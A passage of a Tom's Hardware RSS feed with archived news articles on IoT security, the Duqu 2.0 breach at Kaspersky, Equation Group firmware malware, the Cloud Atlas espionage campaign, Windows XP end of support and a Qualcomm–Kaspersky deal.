It wasn't too long ago that we discovered <a href="http://doctorbeet.blogspot.fr/2013/11/lg-smart-tvs-logging-usb-filenames-and.html">LG</a> and <a href="https://www.schneier.com/blog/archives/2015/02/samsung_televis.html">Samsung</a> smart TVs could either listen to your conversations or track you in other ways.</span></p><p><span>Eugene Kaspersky even went on to say that "IoT," which normally stands for the "Internet of Things," should really be called the "Internet of Threats," because IoT devices are going to vastly expand the ways in which hackers can get to you and your information.</span></p><p><span>We've seen chip companies such as ARM, <a href="https://www.tomshardware.com/news/imagination-omnishield-hardware-security-zones,29138.html">Imagination</a> and <a href="https://www.tomshardware.com/news/freescale-i.mx-7-iot-security,29429.html">Freescale</a> try to tackle IoT security by securely isolating critical data at the hardware level, where most attacks could be stopped dead in their tracks.</span></p><p><span><a href="https://www.tomshardware.com/news/brillo-weave-google-io-announcement,29194.html">Google</a> and <a href="https://www.tomshardware.com/news/arm-mbed-iot-cortex-thread,27802.html">ARM</a> have also been working on their own simpler and more secure operating systems for IoT devices. The two companies have been working on <a href="http://threadgroup.org/2014_07_Press_Release.aspx">Thread</a> as well, a mesh networking protocol that's supposed to keep most IoT devices off the Internet so they can't be exposed directly to hackers.</span></p><p><span>Even all of the above will likely not be enough to keep IoT devices very secure. 
It will ultimately be up to the OEMs making those $50 smart coffee machines to update them on time whenever a new vulnerability is found in their devices, and to keep doing so for as long as their customers keep using them (which could be 10 years or more, especially in the case of smart TVs or cars).</span></p><p><span>Having certain types of electronics become smarter does have its own value and advantages, which is why the Internet of Things (or Threats, as it were) seems unavoidable. If the security of these devices becomes a top priority for customers, then companies selling IoT devices with weak security might eventually be pushed out of the market. This could be harder to achieve in certain markets (such as coffee machines), while it could be much easier in markets where "smart things" can kill you if you get hacked (such as the smart car market).</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Hacked By Stuxnet-Linked Attacker ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-hacked-by-stuxnet-creator,29348.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky announced that it was hacked by the Stuxnet and Duqu creator with the help of an almost undetectable piece of malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">XFPJGAaTzRvzUNkXZAEzAD</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/vNpfidZvzZEo7LYxSETU5g-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Wed, 10 Jun 2015 17:55:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:10 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/vNpfidZvzZEo7LYxSETU5g-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/vNpfidZvzZEo7LYxSETU5g-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:647px;"><p class="vanilla-image-block" style="padding-top:70.79%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/vNpfidZvzZEo7LYxSETU5g.png" mos="https://cdn.mos.cms.futurecdn.net/vNpfidZvzZEo7LYxSETU5g.png" align="" fullscreen="1" width="647" height="458" attribution="" endorsement="" class="pull- expandable"></p></div></div></figure><p><span>Kaspersky, a leading anti-virus company from Russia, announced that it uncovered a piece of malware on its networks that tried to steal information about its products and clients.</span></p><p><span>The company called the malware "Duqu 2.0" due to its similarity to the "Duqu" malware found in 2011 and used in attacks against Iran, India, France and Ukraine. Duqu was also seen at the time as being <a href="https://firstlook.org/theintercept/2014/11/12/stuxnet/">linked to the Stuxnet malware</a>, which is believed to have been created by the U.S. and Israeli spy agencies.</span></p><p><span>The attack was found early this year when Kaspersky was testing an "anti-APT" (Advanced Persistent Threat) solution the company was developing. The malware was otherwise almost impossible to detect because it resided only in kernel memory and deleted all of its traces on disk.</span></p><p><span>It also didn't connect directly to a command-and-control server to receive instructions. Instead, the attackers infected the network gateways in order to proxy the company's traffic through their own command-and-control servers.</span></p><p><span>The attack also used three zero-day vulnerabilities in Microsoft's software installers, which are used by many enterprise customers. 
Normally such zero-day vulnerabilities cost hundreds of thousands of dollars each on the black market. However, if the attacker was indeed the NSA, it could also have gotten them for free from "cyber threat sharing" programs, in which companies give the NSA access to their vulnerabilities months before patches are ready or before anyone else knows the bugs even exist. Such programs are supposed to give the NSA advance notice to secure its networks, but they can also be used for offensive purposes before the vulnerabilities are patched by the companies.</span></p><p><span>Whoever the attackers were, they must have thought they could never be detected, or that eventual detection was worth the price if they could steal useful data. Kaspersky said that because it detected the attack early, only some intellectual property was stolen and its customers' data is safe.</span></p><p><span>However, it warned that the attack may already be in use against other high-value targets around the world. Others may not have Kaspersky's expertise to protect themselves against this complex and nearly undetectable malware, so the company will offer assistance to those interested in detecting Duqu 2.0.</span></p><p><span>Kaspersky has already contacted the police in different countries to investigate this attack and called for law enforcement to openly prosecute such attacks, which can ultimately leave ordinary citizens exposed to even more malicious attackers.</span></p><p>“Spying on cybersecurity companies is a very dangerous tendency. Security software is the last frontier of protection for businesses and customers in the modern world, where hardware and network equipment can be compromised. Moreover, sooner or later technologies implemented in similar targeted attacks will be examined and utilized by terrorists and professional cybercriminals. 
And that is an extremely serious and possible scenario," commented Eugene Kaspersky, CEO of Kaspersky Lab.“Reporting such incidents is the only way to make the world more secure. This helps to improve the security design of enterprise infrastructure and sends a straightforward signal to developers of this malware: all illegal operations will be stopped and prosecuted. The only way to protect the world is to have law enforcement agencies and security companies fighting such attacks openly. We will always report attacks regardless of their origin," he added.</p><p><em>Follow us </em><a href="https://twitter.com/tomshardware"><em>@tomshardware</em></a><em>, on </em><a href="https://www.facebook.com/tomshardware"><em>Facebook</em></a><em> and on </em><a href="https://plus.google.com/u/0/+tomshardware/posts"><em>Google+</em></a><em>.</em></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Says 'The Equation Group' Is A Unique And Dangerous Threat ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-equation-group-cyber-threat,28573.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky Lab discussed a threat that has been in operation for nearly two decades. According to the firm, the cyber threat known as "The Equation Group" is unlike anything they have dealt with. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">kCP5f7pwFxu9zJenvo2VQo</guid>
                                                                                                                            <pubDate>Tue, 17 Feb 2015 02:45:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Antivirus]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Security Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Michael Justin Allen Sexton ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="http://www.kaspersky.com/about/news/virus/2015/Equation-Group-The-Crown-Creator-of-Cyber-Espionage"><span class="InternetLink">Kaspersky Lab discussed</span></a> a threat that has been in operation for nearly two decades. According to the firm, the cyber threat known as "The Equation Group" is unlike anything it has dealt with over its 60 years of work in the security business.</p><p>"They use tools that are very complicated and expensive to develop, in order to infect victims, retrieve data, hide activity in an outstandingly professional way, and utilize classic spying techniques to deliver malicious payloads to the victims," said Kaspersky.</p><p>Included in this arsenal of tools employed by The Equation Group is an advanced program that can rewrite the firmware on hard drives, and this is what makes The Equation Group so dangerous. By reprogramming the firmware on a hard drive, malicious code can be stored inside the device itself, where it survives virus scans and even reformatting of the drive.</p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:650px;"><p class="vanilla-image-block" style="padding-top:58.46%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/xBnTywg2Mk2dQyQ9gjbMib.png" mos="https://cdn.mos.cms.futurecdn.net/xBnTywg2Mk2dQyQ9gjbMib.png" align="" fullscreen="1" width="650" height="380" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/xBnTywg2Mk2dQyQ9gjbMib.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>This means the virus cannot be removed without flashing the hard drive's firmware, which no one outside of the manufacturer is set up to do, or replacing the hard drive. Given that this is a new type of threat, it's likely that even hardware experts would never figure out how the virus kept coming back.</p><p>The Equation Group has other tools available, too. To date, the group has been responsible for the distribution of several threats such as DoubleFantasy, Fanny and EquationDrug. What is more concerning is the way in which these threats manage to start and spread.</p><p>Many of the threats were initially spread without using the Internet. DoubleFantasy is one such example: after a scientific conference in Houston, Texas, the attending members of the conference were given a copy of the conference materials on an optical disk. The DoubleFantasy software was installed onto the disks and infected systems when they were used.</p><p>Fanny is another threat developed by The Equation Group that spreads in a unique way, by infecting USB devices to gain access to systems not connected to the network. The software does this by determining when it is connected to a system that lacks an Internet connection, and then it uses the USB devices and another computer with an Internet connection to transport data to and from the non-networked system.</p><p>With so many advanced ways to attack users, The Equation Group stands as a severe threat to cybersecurity.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Red October Malware Comes Back To Infect Windows Phones, Android, And Jailbroken iPhones ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/red-october-malware-cloud-atlas,28220.html</link>
                                                                            <description>
                            <![CDATA[ Red October malware comes back to expand its infection to Windows Phone, Android and iPhones. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">zvYCcVFKTZnXYqRiLzcPaY</guid>
                                                                                                                            <pubDate>Fri, 12 Dec 2014 23:00:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:10 +0000</updated>
                                                                                                                                            <category><![CDATA[Security Software]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/mfcV2AdXT8nwu65RtBEsPA.jpg" mos="https://cdn.mos.cms.futurecdn.net/mfcV2AdXT8nwu65RtBEsPA.jpg" align="" fullscreen="1" width="600" height="450" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/mfcV2AdXT8nwu65RtBEsPA.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>A new, highly complex piece of malware, classified as an "advanced persistent threat," much like the recently discovered <a href="https://www.tomshardware.com/news/symantec-norton-regin-trojan-espionage,28115.html">Regin</a> malware, has been found in the wild by <a href="https://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style">Kaspersky</a> Labs and <a href="https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware">Blue Coat</a>. One company is naming it "Cloud Atlas," while the other calls it "Inception." </span></p><p><span>Both seem to believe it comes from the makers of the Red October espionage malware, which targeted high-level executives from the oil and financial industries as well as government officials. The new malware has the same type of targets in sight, and it's been found in the same countries. The countries most targeted by this malware have been Russia and Kazakhstan, but India, Belarus, Czech Republic, Romania, Venezuela, Mozambique, Paraguay and Turkey are also on the list of countries where Cloud Atlas/Inception infections have been found.</span></p><p><span>Cloud Atlas/Inception infected Android, iOS, Windows Phone and BlackBerry (through some Android apps), as well as the desktop version of Windows. On mobile, the malware would come as a fake WhatsApp update, while on the desktop, it would infect users through a Visual Basic script that people could download from email attachments as part of received documents. The attackers would control the malware through their free accounts with the Swiss cloud storage company CloudMe. </span></p><p><span>The malware's origins seem to be heavily obfuscated. Its code contains "bread crumbs" that led the researchers to multiple countries and regions including China, South Korea, Russia, India, Eastern Europe, Ukraine, the Middle East, the UK and even the U.S. Whoever built it wanted to make it very difficult for others to pinpoint their location.</span></p><p><span>Blue Coat warns users to be on the lookout for unauthorized WebDAV traffic or "regsvr32.exe" constantly running in the process list. Users should also watch out for emails containing RTF documents and MMS messages that tell you to update certain apps. </span></p><p><span>The usual recommendations to keep your devices safe also apply: stay up to date, don't install apps from untrusted sources, and don't root or jailbreak devices to give yourself (and therefore any attacker as well) full control.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Will Protect Windows XP After Microsoft's Deadline ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-lab-windows-xp-security-april,25745.html</link>
                                                                            <description>
                            <![CDATA[ If you're still clinging to Windows XP, at least one security firm will have your back. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">AwBBxiiYNwU7GYEpSkm4xQ</guid>
                                                                                                                            <pubDate>Thu, 16 Jan 2014 02:20:00 +0000</pubDate>                                                                                                                                <updated>Wed, 05 Feb 2025 14:15:57 +0000</updated>
                                                                                                                                            <category><![CDATA[Security Software]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Kevin Parrish ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:400px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/EPmJbmWunS75yDuVHEDas6.jpg" mos="https://cdn.mos.cms.futurecdn.net/EPmJbmWunS75yDuVHEDas6.jpg" align="" fullscreen="1" width="400" height="300" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/EPmJbmWunS75yDuVHEDas6.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>As previously reported, Microsoft plans to end support for Windows XP (SP3) as of April 8, 2014. The Redmond company also plans to shut off Security Essentials for the platform, leaving Windows XP users depending on third-party products. For those still refusing to upgrade to Windows 7 or Windows 8, Kaspersky Lab has your back.</p><p><a href="http://www.ciol.com/ciol/news/206332/kaspersky-continue-support-windows-xp-os">According to CIOL</a>, Kaspersky Anti-Virus 2013 and Kaspersky Internet Security 2013 will keep on protecting Windows XP users in accordance with Kaspersky Lab product lifecycles, which may span at least two future generations of both security solutions. The corporate protection solution Kaspersky Endpoint Security 10 for Windows will end support for Windows XP SP3 in the second quarter of 2016.</p><p>Meanwhile, Microsoft is gearing up to patch <a href="http://technet.microsoft.com/en-us/security/advisory/2914486">a serious vulnerability in Windows XP</a> that could allow hackers to take full control of the PC. "The vulnerability is an elevation of privilege vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights," Microsoft explains.</p><p>Russ Ernst, director of product management at Lumension, <a href="http://www.pcworld.com/article/2086731/microsoft-readies-urgent-patch-for-windows-xp-next-week.html">recently told PC World</a> that the Windows XP patch was classified as "Important" for a number of reasons, one of which is that Microsoft will end support for Windows XP in April. For those still using XP, this will be an important patch to deploy and install.</p><p>"An attacker must have valid log on credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users," Microsoft's bulletin adds.</p><p><a href="http://news.investors.com/technology/011314-686142-microsoft-windows-xp-end-could-spell-pc-security-problems.htm">Investors.com reports</a> that around 30 percent of PCs in use still run Windows XP. According to analysts, many businesses and consumers will take their chances and keep using the platform until their PCs finally bite the dust. And even then, they may not upgrade to a Windows-based machine.</p><p>As it stands now, many consumers and businesses are still clinging to Windows XP because they're running legacy software, such as a payroll application in accounting or an inventory application, that won't run correctly in Windows 7 or Windows 8.</p><p>"I was in one warehouse location where they had fixed terminals that were on XP and they're now going to iPads," said Victor Janulaitis, CEO of tech consulting firm Janco Associates. "So they're never going to do anything with those PCs. They're just sitting there. It's like an old-time punch-card time clock in a factory."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Qualcomm, Kaspersky Team Up to Improve Android Security ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/Qualcomm-Snapdragon-Lower-Level-Nikolay-Grebenikov-Kaspersky,22549.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky will be adding a security solution at the lower level of a mobile OS. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">xJW4ooRVrsN9V4PQsrBJyd</guid>
                                                                                                                            <pubDate>Tue, 14 May 2013 20:00:00 +0000</pubDate>                                                                                                                                <updated>Wed, 05 Feb 2025 14:20:36 +0000</updated>
                                                                                                                                            <category><![CDATA[Security Software]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Kevin Parrish ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:400px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/CqMRocgWxB5kFYAN6y2s2h.png" mos="https://cdn.mos.cms.futurecdn.net/CqMRocgWxB5kFYAN6y2s2h.png" align="" fullscreen="1" width="400" height="300" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/CqMRocgWxB5kFYAN6y2s2h.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>On Monday <a href="http://www.kaspersky.com/about/news/business/2013/Kaspersky_Lab_Has_Signed_an_Agreement_with_Qualcomm_Technologies">Kaspersky Lab said that it has signed a deal with Qualcomm</a> to improve security "at the lower level" of a smartphone and tablet's mobile operating system. This includes offering "special terms" for preloading the security firm's Mobile Security and Tablet Security products on Android devices powered by Snapdragon chips.</p><p>"Kaspersky will be offering these special terms to a wide range of customers, who are manufacturing or having manufactured on their behalf Snapdragon-enabled mobile devices or tablets running on Android," the company said. "To date, Qualcomm Snapdragon processors can be found in more than 770 commercially available or announced products, with another 550 product designs in the pipeline, from 70+ device customers."</p><p>According to Kaspersky Lab CTO Nikolay Grebenikov, the company proposed a partnership with Qualcomm back in February. Some of the concepts thrown on the table include using separate parts of a mobile OS to employ security, an ability to store information securely, and the ability to make a connection to a secure cloud. 
Currently the project is in a very early stage, he said.</p><p>"We are trying to build relationships with some vendors in the mobile world - a main one for us is Qualcomm - we are talking with them about incorporating security in the lower level operating system," <a href="http://www.theinquirer.net/inquirer/news/2262217/kaspersky-inks-a-deal-with-qualcomm-to-improve-android-security">Grebenikov told The Inquirer</a>. "For example, [vendors] cannot protect against malware which is divided into several pieces and each is not malicious itself but when installed all together they will have a malicious functionality."</p><p>Kaspersky Lab said it already has more than 80 global partner and technology agreements with companies including Microsoft, IBM, Cisco, Juniper Networks, Alcatel Lucent, Blue Coat, Check Point, D-Link, GFI, Gwava, Netgear, SonicWALL, RSA, ZyXel, Alt-N, Parallels, Lenovo and Facebook.</p><p>"We have a solid number of global companies we work with, and Qualcomm Technologies will be one of the most important among them," added chairman and CEO Eugene Kaspersky. "We are looking forward to providing solutions to a wide range of device manufacturers, who are designing and/or building Snapdragon-enabled mobile devices or tablets running on Android."</p><p>Offering security at the lowest software level should help reduce the growing threat of malware on mobile devices, especially those powered by Google's Android platform.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
            </channel>
</rss>